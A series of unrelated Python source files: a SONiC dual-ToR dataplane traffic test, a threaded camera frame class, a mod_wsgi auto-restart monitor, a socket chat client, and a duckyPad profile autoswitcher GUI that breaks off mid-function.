PTFRUNNER_QLEN = 1000
VLAN_INDEX = 0
VLAN_HOSTS = 100
VLAN_BASE_MAC_PATTERN = "72060001{:04}"
LAG_BASE_MAC_PATTERN = '5c010203{:04}'
logger = logging.getLogger(__name__)
class DualTorIO:
def __init__(self, activehost, standbyhost, ptfhost, ptfadapter, tbinfo,
io_ready, tor_vlan_port=None, send_interval=0.01):
self.tor_pc_intf = None
self.tor_vlan_intf = tor_vlan_port
self.duthost = activehost
self.ptfadapter = ptfadapter
self.ptfhost = ptfhost
self.tbinfo = tbinfo
self.io_ready_event = io_ready
self.dut_mac = self.duthost.facts["router_mac"]
self.active_mac = self.dut_mac
self.standby_mac = standbyhost.facts["router_mac"]
self.dataplane = self.ptfadapter.dataplane
self.dataplane.flush()
self.test_results = dict()
self.stop_early = False
self.ptf_sniffer = "/root/dual_tor_sniffer.py"
# Calculate valid range for T1 src/dst addresses
mg_facts = self.duthost.get_extended_minigraph_facts(self.tbinfo)
prefix_len = mg_facts['minigraph_vlan_interfaces'][VLAN_INDEX]['prefixlen'] - 3
test_network = ipaddress.ip_address(
mg_facts['minigraph_vlan_interfaces'][VLAN_INDEX]['addr']) +\
(1 << (32 - prefix_len))
self.default_ip_range = str(ipaddress.ip_interface(unicode(
str(test_network) + '/{0}'.format(prefix_len))).network)
self.src_addr, mask = self.default_ip_range.split('/')
self.n_hosts = 2**(32 - int(mask))
self.tor_to_ptf_intf_map = mg_facts['minigraph_ptf_indices']
portchannel_info = mg_facts['minigraph_portchannels']
self.tor_pc_intfs = list()
for pc in portchannel_info.values():
for member in pc['members']:
self.tor_pc_intfs.append(member)
self.vlan_interfaces = mg_facts["minigraph_vlans"].values()[VLAN_INDEX]["members"]
config_facts = self.duthost.get_running_config_facts()
vlan_table = config_facts['VLAN']
vlan_name = list(vlan_table.keys())[0]
self.vlan_mac = vlan_table[vlan_name]['mac']
self.mux_cable_table = config_facts['MUX_CABLE']
self.ptf_intf_to_server_ip_map = self._generate_vlan_servers()
self.__configure_arp_responder()
logger.info("VLAN interfaces: {}".format(str(self.vlan_interfaces)))
logger.info("PORTCHANNEL interfaces: {}".format(str(self.tor_pc_intfs)))
self.time_to_listen = 300.0
self.sniff_time_incr = 0
# Inter-packet send-interval (minimum interval 3.5ms)
if send_interval < 0.0035:
if send_interval is not None:
logger.warn("Minimum packet send-interval is .0035s. \
Ignoring user-provided interval {}".format(send_interval))
self.send_interval = 0.0035
else:
self.send_interval = send_interval
# How many packets to be sent by sender thread
logger.info("Using send interval {}".format(self.send_interval))
self.packets_to_send = min(int(self.time_to_listen /
(self.send_interval * 2)), 45000)
self.packets_sent_per_server = dict()
if self.tor_vlan_intf:
self.packets_per_server = self.packets_to_send
else:
self.packets_per_server = self.packets_to_send // len(self.vlan_interfaces)
self.all_packets = []
def _generate_vlan_servers(self):
"""
Create mapping of server IPs to PTF interfaces
"""
server_ip_list = []
for _, config in natsorted(self.mux_cable_table.items()):
server_ip_list.append(str(config['server_ipv4'].split("/")[0]))
logger.info("ALL server address:\n {}".format(server_ip_list))
ptf_to_server_map = dict()
for i, vlan_intf in enumerate(natsorted(self.vlan_interfaces)):
ptf_intf = self.tor_to_ptf_intf_map[vlan_intf]
addr = server_ip_list[i]
ptf_to_server_map[ptf_intf] = [str(addr)]
logger.debug('VLAN intf to server IP map: {}'.format(json.dumps(ptf_to_server_map, indent=4, sort_keys=True)))
return ptf_to_server_map
def __configure_arp_responder(self):
"""
@summary: Generate ARP responder configuration using vlan_host_map.
Copy this configuration to PTF and restart arp_responder
"""
arp_responder_conf = {}
for intf, ip in self.ptf_intf_to_server_ip_map.items():
arp_responder_conf['eth{}'.format(intf)] = ip
with open("/tmp/from_t1.json", "w") as fp:
json.dump(arp_responder_conf, fp, indent=4, sort_keys=True)
self.ptfhost.copy(src="/tmp/from_t1.json", dest="/tmp/from_t1.json")
self.ptfhost.shell("supervisorctl reread && supervisorctl update")
self.ptfhost.shell("supervisorctl restart arp_responder")
logger.info("arp_responder restarted")
def start_io_test(self, traffic_generator=None):
"""
@summary: The entry point to start the TOR dataplane I/O test.
Args:
traffic_generator (function): A callback function to decide the
traffic direction (T1 to server / server to T1)
Allowed values: self.generate_from_t1_to_server or
self.generate_from_server_to_t1
"""
# Check in a conditional for better readability
self.traffic_generator = traffic_generator
if self.traffic_generator == self.generate_from_t1_to_server:
self.generate_from_t1_to_server()
elif self.traffic_generator == self.generate_from_server_to_t1:
self.generate_from_server_to_t1()
else:
logger.error("Traffic generator not provided or invalid")
return
# start and later join the sender and sniffer threads
self.send_and_sniff(sender=self.traffic_sender_thread,
sniffer=self.traffic_sniffer_thread)
def generate_from_t1_to_server(self):
"""
@summary: Generate (not send) the packets to be sent from T1 to server
"""
logger.info("Generating T1 to server packets")
eth_dst = self.dut_mac
ip_ttl = 255
if self.tor_pc_intf and self.tor_pc_intf in self.tor_pc_intfs:
# If a source portchannel intf is specified,
# get the corresponding PTF info
ptf_t1_src_intf = self.tor_to_ptf_intf_map[self.tor_pc_intf]
eth_src = self.ptfadapter.dataplane.get_mac(0, ptf_t1_src_intf)
random_source = False
else:
# If no source portchannel specified, randomly choose one
# during packet generation
logger.info('Using random T1 source intf')
ptf_t1_src_intf = None
eth_src = None
random_source = True
if self.tor_vlan_intf:
# If destination VLAN intf is specified,
# use only the connected server
ptf_port = self.tor_to_ptf_intf_map[self.tor_vlan_intf]
server_ip_list = [
self.ptf_intf_to_server_ip_map[ptf_port]
]
else:
# Otherwise send packets to all servers
server_ip_list = self.ptf_intf_to_server_ip_map.values()
logger.info("-"*20 + "T1 to server packet" + "-"*20)
logger.info("PTF source intf: {}"
.format('random' if random_source else ptf_t1_src_intf)
)
logger.info("Ethernet address: dst: {} src: {}"
.format(eth_dst, 'random' if random_source else eth_src)
)
logger.info("IP address: dst: {} src: random"
.format('all' if len(server_ip_list) > 1
else server_ip_list[0]
)
)
logger.info("TCP port: dst: {}".format(TCP_DST_PORT))
logger.info("DUT mac: {}".format(self.dut_mac))
logger.info("VLAN mac: {}".format(self.vlan_mac))
logger.info("-"*50)
self.packets_list = []
# Create packet #1 for each server and append to the list,
# then packet #2 for each server, etc.
# This way, when sending packets we continuously send for all servers
# instead of sending all packets for server #1, then all packets for
# server #2, etc.
tcp_tx_packet_orig = testutils.simple_tcp_packet(
eth_dst=eth_dst,
eth_src=eth_src,
ip_ttl=ip_ttl,
tcp_dport=TCP_DST_PORT
)
tcp_tx_packet_orig = scapyall.Ether(str(tcp_tx_packet_orig))
payload_suffix = "X" * 60
for i in range(self.packets_per_server):
for server_ip in server_ip_list:
packet = tcp_tx_packet_orig.copy()
if random_source:
tor_pc_src_intf = random.choice(
self.tor_pc_intfs
)
ptf_t1_src_intf = self.tor_to_ptf_intf_map[tor_pc_src_intf]
eth_src = self.ptfadapter.dataplane.get_mac(
0, ptf_t1_src_intf
)
packet[scapyall.Ether].src = eth_src
packet[scapyall.IP].src = self.random_host_ip()
packet[scapyall.IP].dst = server_ip
payload = str(i) + payload_suffix
packet.load = payload
packet[scapyall.TCP].chksum = None
packet[scapyall.IP].chksum = None
self.packets_list.append((ptf_t1_src_intf, str(packet)))
self.sent_pkt_dst_mac = self.dut_mac
self.received_pkt_src_mac = [self.vlan_mac]
def generate_from_server_to_t1(self):
"""
@summary: Generate (not send) the packets to be sent from server to T1
"""
logger.info("Generating server to T1 packets")
if self.tor_vlan_intf:
vlan_src_intfs = [self.tor_vlan_intf]
# If destination VLAN intf is specified,
# use only the connected server
else:
# Otherwise send packets to all servers
vlan_src_intfs = self.vlan_interfaces
ptf_intf_to_mac_map = {}
for ptf_intf in self.ptf_intf_to_server_ip_map.keys():
ptf_intf_to_mac_map[ptf_intf] = self.ptfadapter.dataplane.get_mac(0, ptf_intf)
logger.info("-"*20 + "Server to T1 packet" + "-"*20)
if self.tor_vlan_intf is None:
src_mac = 'random'
src_ip = 'random'
else:
ptf_port = self.tor_to_ptf_intf_map[self.tor_vlan_intf]
src_mac = ptf_intf_to_mac_map[ptf_port]
src_ip = self.ptf_intf_to_server_ip_map[ptf_port]
logger.info(
"Ethernet address: dst: {} src: {}".format(
self.vlan_mac, src_mac
)
)
logger.info(
"IP address: dst: {} src: {}".format(
'random', src_ip
)
)
logger.info("TCP port: dst: {} src: 1234".format(TCP_DST_PORT))
logger.info("Active ToR MAC: {}, Standby ToR MAC: {}".format(self.active_mac,
self.standby_mac))
logger.info("VLAN MAC: {}".format(self.vlan_mac))
logger.info("-"*50)
self.packets_list = []
# Create packet #1 for each server and append to the list,
# then packet #2 for each server, etc.
# This way, when sending packets we continuously send for all servers
# instead of sending all packets for server #1, then all packets for
# server #2, etc.
tcp_tx_packet_orig = testutils.simple_tcp_packet(
eth_dst=self.vlan_mac,
tcp_dport=TCP_DST_PORT
)
tcp_tx_packet_orig = scapyall.Ether(str(tcp_tx_packet_orig))
payload_suffix = "X" * 60
for i in range(self.packets_per_server):
for vlan_intf in vlan_src_intfs:
ptf_src_intf = self.tor_to_ptf_intf_map[vlan_intf]
server_ip = self.ptf_intf_to_server_ip_map[ptf_src_intf]
eth_src = ptf_intf_to_mac_map[ptf_src_intf]
payload = str(i) + payload_suffix
packet = tcp_tx_packet_orig.copy()
packet[scapyall.Ether].src = eth_src
packet[scapyall.IP].src = server_ip
packet[scapyall.IP].dst = self.random_host_ip()
packet.load = payload
packet[scapyall.TCP].chksum = None
packet[scapyall.IP].chksum = None
self.packets_list.append((ptf_src_intf, str(packet)))
self.sent_pkt_dst_mac = self.vlan_mac
self.received_pkt_src_mac = [self.active_mac, self.standby_mac]
def random_host_ip(self):
"""
@summary: Helper method to find a random host IP for generating a random src/dst IP address
Returns:
host_ip (str): Random IP address
"""
host_number = random.randint(2, self.n_hosts - 2)
if host_number > (self.n_hosts - 2):
raise Exception("host number {} is greater than number of hosts {}\
in the network {}".format(
host_number, self.n_hosts - 2, self.default_ip_range))
src_addr_n = struct.unpack(">I", socket.inet_aton(self.src_addr))[0]
net_addr_n = src_addr_n & (2**32 - self.n_hosts)
host_addr_n = net_addr_n + host_number
host_ip = socket.inet_ntoa(struct.pack(">I", host_addr_n))
return host_ip
def send_and_sniff(self, sender, sniffer):
"""
@summary: This method starts and joins two background threads in parallel: sender and sniffer
"""
self.sender_thr = InterruptableThread(target=sender)
self.sniff_thr = InterruptableThread(target=sniffer)
self.sniffer_started = threading.Event()
self.sniff_thr.set_error_handler(lambda *args, **kargs: self.sniffer_started.set())
self.sender_thr.set_error_handler(lambda *args, **kargs: self.io_ready_event.set())
self.sniff_thr.start()
self.sender_thr.start()
self.sender_thr.join()
self.sniff_thr.join()
def traffic_sender_thread(self):
"""
@summary: Generalized Sender thread (to be used for traffic in both directions)
Waits for a signal from the `traffic_sniffer_thread` before actually starting.
This is to make sure that that packets are not sent before they are ready to be captured.
"""
logger.info("Sender waiting to send {} packets".format(len(self.packets_list)))
self.sniffer_started.wait(timeout=10)
sender_start = datetime.datetime.now()
logger.info("Sender started at {}".format(str(sender_start)))
# Signal data_plane_utils that sender and sniffer threads have begun
self.io_ready_event.set()
sent_packets_count = 0
for entry in self.packets_list:
_, packet = entry
server_addr = self.get_server_address(scapyall.Ether(str(packet)))
time.sleep(self.send_interval)
# the stop_early flag can be set to True by data_plane_utils to stop prematurely
if self.stop_early:
break
testutils.send_packet(self.ptfadapter, *entry)
self.packets_sent_per_server[server_addr] =\
self.packets_sent_per_server.get(server_addr, 0) + 1
sent_packets_count = sent_packets_count + 1
time.sleep(10)
self.stop_sniffer_early()
logger.info("Stop the sender thread gracefully after sending {} packets"\
.format(sent_packets_count))
logger.info("Sender finished running after {}".format(
str(datetime.datetime.now() - sender_start)))
def stop_sniffer_early(self):
# Try to stop sniffer earlier by sending SIGINT signal to the sniffer process
# Python installs a small number of signal handlers by default.
# SIGINT is translated into a KeyboardInterrupt exception.
logger.info("Stop the sniffer thread gracefully: sending SIGINT to ptf process")
self.ptfhost.command("pkill -SIGINT -f {}".format(self.ptf_sniffer),\
module_ignore_errors=True)
def get_server_address(self, packet):
if self.traffic_generator == self.generate_from_t1_to_server:
server_addr = packet[scapyall.IP].dst
elif self.traffic_generator == self.generate_from_server_to_t1:
server_addr = packet[scapyall.IP].src
return server_addr
def traffic_sniffer_thread(self):
"""
@summary: Generalized sniffer thread (to be used for traffic in both directions)
Starts `scapy_sniff` thread, and waits for its setup before
signalling the sender thread to start
"""
wait = self.time_to_listen + self.sniff_time_incr
sniffer_start = datetime.datetime.now()
logger.info("Sniffer started at {}".format(str(sniffer_start)))
sniff_filter = "tcp and tcp dst port {} and tcp src port 1234 and not icmp".\
format(TCP_DST_PORT)
# We run a PTF script on PTF to sniff traffic. The PTF script calls
# scapy.sniff which by default capture the backplane interface for
# announcing routes from PTF to VMs. On VMs, the PTF backplane is the
# next hop for the annoucned routes. So, packets sent by DUT to VMs
# are forwarded to the PTF backplane interface as well. Then on PTF,
# the packets sent by DUT to VMs can be captured on both the PTF interfaces
# tapped to VMs and on the backplane interface. This will result in
# packet duplication and fail the test. Below change is to add capture
# filter to filter out all the packets destined to the PTF backplane interface.
output = self.ptfhost.shell('cat /sys/class/net/backplane/address',\
module_ignore_errors=True)
if not output['failed']:
ptf_bp_mac = output['stdout']
sniff_filter = '({}) and (not ether dst {})'.format(sniff_filter, ptf_bp_mac)
scapy_sniffer = InterruptableThread(
target=self.scapy_sniff,
kwargs={
'sniff_timeout': wait,
'sniff_filter': sniff_filter
}
)
scapy_sniffer.start()
time.sleep(10) # Let the scapy sniff initialize completely.
self.sniffer_started.set() # Unblock waiter for the send_in_background.
scapy_sniffer.join()
logger.info("Sniffer finished running after {}".\
format(str(datetime.datetime.now() - sniffer_start)))
self.sniffer_started.clear()
def scapy_sniff(self, sniff_timeout=180, sniff_filter=''):
"""
@summary: PTF runner - runs a sniffer in PTF container.
Running sniffer in sonic-mgmt container has missing SOCKET problem
and permission issues (scapy and tcpdump require root user)
The remote function listens on all intfs. Once found, all packets
are dumped to local pcap file, and all packets are saved to
self.all_packets as scapy type.
Args:
sniff_timeout (int): Duration in seconds to sniff the traffic
sniff_filter (str): Filter that Scapy will use to collect only relevant packets
"""
capture_pcap = '/tmp/capture.pcap'
capture_log = '/tmp/capture.log'
self.ptfhost.copy(src='scripts/dual_tor_sniffer.py', dest=self.ptf_sniffer)
self.ptfhost.command(
'python {} -f "{}" -p {} -l {} -t {}'.format(
self.ptf_sniffer, sniff_filter, capture_pcap, capture_log, sniff_timeout
)
)
logger.info('Fetching pcap file from ptf')
self.ptfhost.fetch(src=capture_pcap, dest='/tmp/', flat=True, fail_on_missing=False)
self.all_packets = scapyall.rdpcap(capture_pcap)
logger.info("Number of all packets captured: {}".format(len(self.all_packets)))
def get_test_results(self):
return self.test_results
def examine_flow(self):
"""
@summary: This method examines packets collected by sniffer thread
The method compares TCP payloads of the packets one by one (assuming all
payloads are consecutive integers), and the losses if found - are treated
as disruptions in Dataplane forwarding. All disruptions are saved to
self.lost_packets dictionary, in format:
disrupt_start_id = (missing_packets_count, disrupt_time,
disrupt_start_timestamp, disrupt_stop_timestamp)
"""
examine_start = datetime.datetime.now()
logger.info("Packet flow examine started {}".format(str(examine_start)))
if not self.all_packets:
logger.error("self.all_packets not defined.")
return None
# Filter out packets:
filtered_packets = [ pkt for pkt in self.all_packets if
scapyall.TCP in pkt and
not scapyall.ICMP in pkt and
pkt[scapyall.TCP].sport == 1234 and
pkt[scapyall.TCP].dport == TCP_DST_PORT and
self.check_tcp_payload(pkt) and
(
pkt[scapyall.Ether].dst == self.sent_pkt_dst_mac or
pkt[scapyall.Ether].src in self.received_pkt_src_mac
)
]
logger.info("Number of filtered packets captured: {}".format(len(filtered_packets)))
if not filtered_packets or len(filtered_packets) == 0:
logger.error("Sniffer failed to capture any traffic")
return
server_to_packet_map = defaultdict(list)
# Split packets into separate lists based on server IP
for packet in filtered_packets:
server_addr = self.get_server_address(packet)
server_to_packet_map[server_addr].append(packet)
# For each server's packet list, sort by payload then timestamp
# (in case of duplicates)
for server in server_to_packet_map.keys():
server_to_packet_map[server].sort(
key=lambda packet: (int(str(packet[scapyall.TCP].payload)
.replace('X','')),
packet.time)
)
logger.info("Measuring traffic disruptions...")
for server_ip, packet_list in server_to_packet_map.items():
filename = '/tmp/capture_filtered_{}.pcap'.format(server_ip)
scapyall.wrpcap(filename, packet_list)
logger.info("Filtered pcap dumped to {}".format(filename))
self.test_results = {}
for server_ip in natsorted(server_to_packet_map.keys()):
result = self.examine_each_packet(server_ip, server_to_packet_map[server_ip])
logger.info("Server {} results:\n{}"
.format(server_ip, json.dumps(result, indent=4)))
self.test_results[server_ip] = result
def examine_each_packet(self, server_ip, packets):
num_sent_packets = 0
received_packet_list = list()
duplicate_packet_list = list()
disruption_ranges = list()
disruption_before_traffic = False
disruption_after_traffic = False
duplicate_ranges = []
for packet in packets:
if packet[scapyall.Ether].dst == self.sent_pkt_dst_mac:
# This is a sent packet
num_sent_packets += 1
continue
if packet[scapyall.Ether].src in self.received_pkt_src_mac:
# This is a received packet.
# scapy 2.4.5 will use Decimal to calulcate time, but json.dumps
# can't recognize Decimal, transform to float here
curr_time = float(packet.time)
curr_payload = int(str(packet[scapyall.TCP].payload).replace('X',''))
# Look back at the previous received packet to check for gaps/duplicates
# Only if we've already received some packets
if len(received_packet_list) > 0:
prev_payload, prev_time = received_packet_list[-1]
if prev_payload == curr_payload:
# Duplicate packet detected, increment the counter
duplicate_packet_list.append((curr_payload, curr_time))
if prev_payload + 1 < curr_payload:
# Non-sequential packets indicate a disruption
disruption_dict = {
'start_time': prev_time,
'end_time': curr_time,
'start_id': prev_payload,
'end_id': curr_payload
}
disruption_ranges.append(disruption_dict)
# Save packets as (payload_id, timestamp) tuples
# for easier timing calculations later
received_packet_list.append((curr_payload, curr_time))
if len(received_packet_list) == 0:
logger.error("Sniffer failed to filter any traffic from DUT")
else:
# Find ranges of consecutive packets that have been duplicated
# All packets within the same consecutive range will have the same
# difference between the packet index and the sequence number
for _, grouper in groupby(enumerate(duplicate_packet_list), lambda (i,x): i - x[0]):
group = map(itemgetter(1), grouper)
duplicate_start, duplicate_end = group[0], group[-1]
duplicate_dict = {
'start_time': duplicate_start[1],
'end_time': duplicate_end[1],
'start_id': duplicate_start[0],
'end_id': duplicate_end[0]
}
duplicate_ranges.append(duplicate_dict)
# If the first packet we received is not #0, some disruption started
# before traffic started. Store the id of the first received packet
if received_packet_list[0][0] != 0:
disruption_before_traffic = received_packet_list[0][0]
# If the last packet we received does not match the number of packets
# sent, some disruption continued after the traffic finished.
# Store the id of the last received packet
if received_packet_list[-1][0] != self.packets_sent_per_server.get(server_ip) - 1:
disruption_after_traffic = received_packet_list[-1][0]
result = {
'sent_packets': num_sent_packets,
'received_packets': len(received_packet_list),
'disruption_before_traffic': disruption_before_traffic,
'disruption_after_traffic': disruption_after_traffic,
'duplications': duplicate_ranges,
'disruptions': disruption_ranges
}
if num_sent_packets < self.packets_sent_per_server.get(server_ip):
server_addr = self.get_server_address(packet)
logger.error('Not all sent packets were captured. '
'Something went wrong!')
logger.error('Dumping server {} results and continuing:\n{}'
.format(server_addr, json.dumps(result, indent=4)))
return result
def check_tcp_payload(self, packet):
"""
@summary: Helper method
Returns: Bool: True if a packet is not corrupted and has a valid TCP
sequential TCP Payload
"""
try:
int(str(packet[scapyall.TCP].payload).replace('X','')) in range(
self.packets_to_send)
return True
except Exception as err:
return False
|
base_camera.py
|
import time
import threading
import cv2
try:
from greenlet import getcurrent as get_ident
except ImportError:
try:
from thread import get_ident
except ImportError:
from _thread import get_ident
class CameraEvent(object):
"""An Event-like class that signals all active clients when a new frame is
available.
"""
def __init__(self):
self.events = {}
def wait(self):
"""Invoked from each client's thread to wait for the next frame."""
ident = get_ident()
if ident not in self.events:
# this is a new client
# add an entry for it in the self.events dict
# each entry has two elements, a threading.Event() and a timestamp
self.events[ident] = [threading.Event(), time.time()]
return self.events[ident][0].wait()
def set(self):
"""Invoked by the camera thread when a new frame is available."""
now = time.time()
remove = None
for ident, event in self.events.items():
if not event[0].isSet():
# if this client's event is not set, then set it
# also update the last set timestamp to now
event[0].set()
event[1] = now
else:
# if the client's event is already set, it means the client
# did not process a previous frame
# if the event stays set for more than 5 seconds, then assume
# the client is gone and remove it
if now - event[1] > 5:
remove = ident
if remove:
del self.events[remove]
def clear(self):
"""Invoked from each client's thread after a frame was processed."""
self.events[get_ident()][0].clear()
class BaseCamera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
event = CameraEvent()
def __init__(self):
"""Start the background camera thread if it isn't running yet."""
if BaseCamera.thread is None:
BaseCamera.last_access = time.time()
# start background frame thread
BaseCamera.thread = threading.Thread(target=self._thread)
BaseCamera.thread.start()
# wait until frames are available
while self.get_frame() is None:
time.sleep(0)
def get_frame(self):
"""Return the current camera frame."""
BaseCamera.last_access = time.time()
# wait for a signal from the camera thread
BaseCamera.event.wait()
BaseCamera.event.clear()
return BaseCamera.frame
@staticmethod
def frames():
""""Generator that returns frames from the camera."""
raise RuntimeError('Must be implemented by subclasses.')
@classmethod
def _thread(cls):
"""Camera background thread."""
print('Starting camera thread.')
frames_iterator = cls.frames()
for frame in frames_iterator:
BaseCamera.frame = frame
BaseCamera.event.set() # send signal to clients
time.sleep(0)
# if there hasn't been any clients asking for frames in
# the last 10 seconds then stop the thread
if time.time() - BaseCamera.last_access > 10:
frames_iterator.close()
print('Stopping camera thread due to inactivity.')
break
BaseCamera.thread = None
|
wsgi_restart.py
|
# This code lifted from the mod_wsgi docs.
import os
from pathlib import Path
from typing import Sequence
import sys
import signal
import threading
import atexit
import queue
_interval = 1.0
_times = {}
_files = [] # type: Sequence[Path]
_running = False
_queue = queue.Queue() # type: queue.Queue
_lock = threading.Lock()
def _restart(path):
_queue.put(True)
prefix = 'monitor (pid=%d):' % os.getpid()
print('%s Change detected to \'%s\'.' % (prefix, path), file=sys.stderr)
print('%s Triggering process restart.' % prefix, file=sys.stderr)
os.kill(os.getpid(), signal.SIGINT)
def _modified(path):
try:
# If path doesn't denote a file and were previously
# tracking it, then it has been removed or the file type
# has changed so force a restart. If not previously
# tracking the file then we can ignore it as probably
# pseudo reference such as when file extracted from a
# collection of modules contained in a zip file.
if not os.path.isfile(path):
return path in _times
# Check for when file last modified.
mtime = os.stat(path).st_mtime
if path not in _times:
_times[path] = mtime
# Force restart when modification time has changed, even
# if time now older, as that could indicate older file
# has been restored.
if mtime != _times[path]:
return True
except Exception:
# If any exception occured, likely that file has been
# been removed just before stat(), so force a restart.
return True
return False
def _monitor():
while True:
# Check modification times on all files in sys.modules.
for module in sys.modules.values():
if not hasattr(module, '__file__'):
continue
path = getattr(module, '__file__')
if not path:
continue
if os.path.splitext(path)[1] in ['.pyc', '.pyo', '.pyd']:
path = path[:-1]
if _modified(path):
return _restart(path)
# Check modification times on files which have
# specifically been registered for monitoring.
for path in _files:
if _modified(path):
return _restart(path)
# Go to sleep for specified interval.
try:
return _queue.get(timeout=_interval)
except Exception:
pass
_thread = threading.Thread(target=_monitor)
_thread.setDaemon(True)
def _exiting():
try:
_queue.put(True)
except Exception:
pass
_thread.join()
atexit.register(_exiting)
def track(path):
if path not in _files:
_files.append(path)
def start(interval=1.0):
global _interval
if interval < _interval:
_interval = interval
global _running
_lock.acquire()
if not _running:
prefix = 'monitor (pid=%d):' % os.getpid()
print('%s Starting change monitor.' % prefix, file=sys.stderr)
_running = True
_thread.start()
|
client-socket.py
|
import socket
import threading
# Choosing a nickname
nickname = input("Enter a nickname: ")
# Connecting the client to the server
clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientSocket.connect((socket.gethostbyname(socket.gethostname()), 12458))
# Listening to the server and Sending the nickname
def receive():
while True:
try:
# Receive a message from the server (Not visible to user)
message = clientSocket.recv(1024).decode('ascii')
if message == 'NICK':
clientSocket.send(nickname.encode('ascii'))
else:
print('>' + message)
except:
# Close the connection if an error occurs
print('An error occured')
clientSocket.close()
break
# A function which helps in writing messages
def write():
while True:
message = '> {}: {}'.format(nickname, input(' '))
clientSocket.send(message.encode('ascii'))
# Starting Threads For Listening And Writing
receive_thread = threading.Thread(target=receive)
receive_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start()
|
duckypad_autoprofile.py
|
import time
from tkinter import *
from tkinter import filedialog
from tkinter import simpledialog
from tkinter import messagebox
import urllib.request
import tkinter.scrolledtext as ScrolledText
import traceback
import json
import os
import webbrowser
import sys
import threading
import logging
import hid_rw
import get_window
import check_update
from appdirs import *
import subprocess
def is_root():
return os.getuid() == 0
def ensure_dir(dir_path):
if not os.path.exists(dir_path):
os.makedirs(dir_path)
# xhost +;sudo python3 duckypad_autoprofile.py
appname = 'duckypad_autoswitcher'
appauthor = 'dekuNukem'
save_path = user_data_dir(appname, appauthor, roaming=True)
ensure_dir(save_path)
save_filename = os.path.join(save_path, 'config.txt')
logging_filename = os.path.join(save_path, 'debug_log.txt')
logging.basicConfig(level=logging.INFO, filename=logging_filename, filemode='w', format='%(asctime)s %(filename)s %(levelname)s %(message)s')
default_button_color = 'SystemButtonFace'
if 'linux' in sys.platform:
default_button_color = 'grey'
THIS_VERSION_NUMBER = '0.0.7'
MAIN_WINDOW_WIDTH = 640
MAIN_WINDOW_HEIGHT = 660
PADDING = 10
fw_update_checked = False
logging.info("duckyPad autoswitcher started! V" + THIS_VERSION_NUMBER)
def duckypad_connect(show_box=True):
# print("def duckypad_connect():")
logging.info("def duckypad_connect():")
global fw_update_checked
if hid_rw.get_duckypad_path() is None:
connection_info_str.set("duckyPad not found")
connection_info_label.config(foreground='red')
logging.info("duckyPad not found")
return
init_success = True
try:
init_success = hid_rw.duckypad_init()
except Exception as e:
init_success = False
logging.error(traceback.format_exc())
if init_success is False:
connection_info_str.set("duckyPad detected but lacks permission")
connection_info_label.config(foreground='red')
if init_success is False and show_box is False:
return
if init_success is False and 'darwin' in sys.platform and is_root() is False:
if messagebox.askokcancel("Info", "duckyPad detected, but this app lacks permission to access it.\n\nClick OK to see instructions") is True:
webbrowser.open('https://github.com/dekuNukem/duckyPad/blob/master/troubleshooting.md#autoswitcher--usb-configuration-isnt-working-on-macos')
return
elif init_success is False and 'darwin' in sys.platform and is_root() is True:
if messagebox.askokcancel("Info", "duckyPad detected, however, due to macOS restrictions, you'll need to enable some privacy settings.\n\nClick OK to learn how.") is True:
webbrowser.open('https://github.com/dekuNukem/duckyPad/blob/master/troubleshooting.md#autoswitcher--usb-configuration-isnt-working-on-macos')
return
elif init_success is False and 'linux' in sys.platform:
if messagebox.askokcancel("Info", "duckyPad detected, but you need to change some settings to use it.\n\nClick OK to learn how.") is True:
webbrowser.open('https://github.com/dekuNukem/duckyPad/blob/master/app_posix.md')
return
elif init_success is False:
messagebox.showinfo("Info", "Failed to connect to duckyPad")
return
connection_info_str.set("duckyPad connected!")
connection_info_label.config(foreground='navy')
logging.info("duckyPad found!")
try:
result = hid_rw.duckypad_get_info()
connection_info_str.set(f"duckyPad found! Model: {result['model']} Serial: {result['serial']} Firmware: {result['fw_ver']}")
logging.info("has extra info")
if fw_update_checked is False:
print_fw_update_label(result['fw_ver'])
fw_update_checked = True
except Exception as e:
# print(traceback.format_exc())
logging.error(traceback.format_exc())
hid_rw.duckypad_close()
def update_windows(textbox):
# print("def update_windows(textbox):")
logging.info("def update_windows(textbox):")
windows_str = 'Application' + ' '*14 + "Window Title\n"
windows_str += "-------------------------------------\n"
for item in get_window.get_list_of_all_windows():
gap = 25 - len(item[0])
windows_str += str(item[0]) + ' '*gap + str(item[1]) + '\n'
textbox.config(state=NORMAL)
textbox.delete(1.0, "end")
textbox.insert(1.0, windows_str)
textbox.config(state=DISABLED)
def duckypad_write_with_retry(data_buf):
logging.info("def duckypad_write_with_retry(data_buf):")
try:
hid_rw.duckypad_init()
hid_rw.duckypad_hid_write(data_buf)
hid_rw.duckypad_close()
return 0
except Exception as e:
# print(traceback.format_exc())
logging.error("First try: " + str(traceback.format_exc()))
try:
duckypad_connect(show_box=False)
hid_rw.duckypad_init()
hid_rw.duckypad_hid_write(data_buf)
hid_rw.duckypad_close()
return 0
except Exception as e:
logging.error("Second try: " + str(traceback.format_exc()))
return 1
def prev_prof_click():
# print("def prev_prof_click():")
logging.info("def prev_prof_click():")
buffff = [0] * 64
buffff[0] = 5
buffff[2] = 2
duckypad_write_with_retry(buffff)
def next_prof_click():
# print("def next_prof_click():")
logging.info("def next_prof_click():")
buffff = [0] * 64
buffff[0] = 5
buffff[2] = 3
duckypad_write_with_retry(buffff)
root = Tk()
root.title("duckyPad autoswitcher " + THIS_VERSION_NUMBER)
root.geometry(str(MAIN_WINDOW_WIDTH) + "x" + str(MAIN_WINDOW_HEIGHT))
root.resizable(width=FALSE, height=FALSE)
# --------------------
connection_info_str = StringVar()
connection_info_str.set("<--- Press Connect button")
connection_info_lf = LabelFrame(root, text="Connection", width=620, height=60)
connection_info_lf.place(x=PADDING, y=0)
connection_info_label = Label(master=connection_info_lf, textvariable=connection_info_str)
connection_info_label.place(x=110, y=5)
connection_info_label.config(foreground='orange red')
connection_button = Button(connection_info_lf, text="Connect", command=duckypad_connect)
connection_button.config(width=11, height=1)
connection_button.place(x=PADDING, y=5)
# --------------------
discord_link_url = "https://raw.githubusercontent.com/dekuNukem/duckyPad/master/resources/discord_link.txt"
def open_user_manual():
# print("def open_user_manual():")
logging.info("def open_user_manual():")
webbrowser.open('https://github.com/dekuNukem/duckyPad-profile-autoswitcher#user-manual')
def open_discord():
# print("def open_discord():")
logging.info("def open_discord():")
try:
webbrowser.open(str(urllib.request.urlopen(discord_link_url).read().decode('utf-8')).split('\n')[0])
except Exception as e:
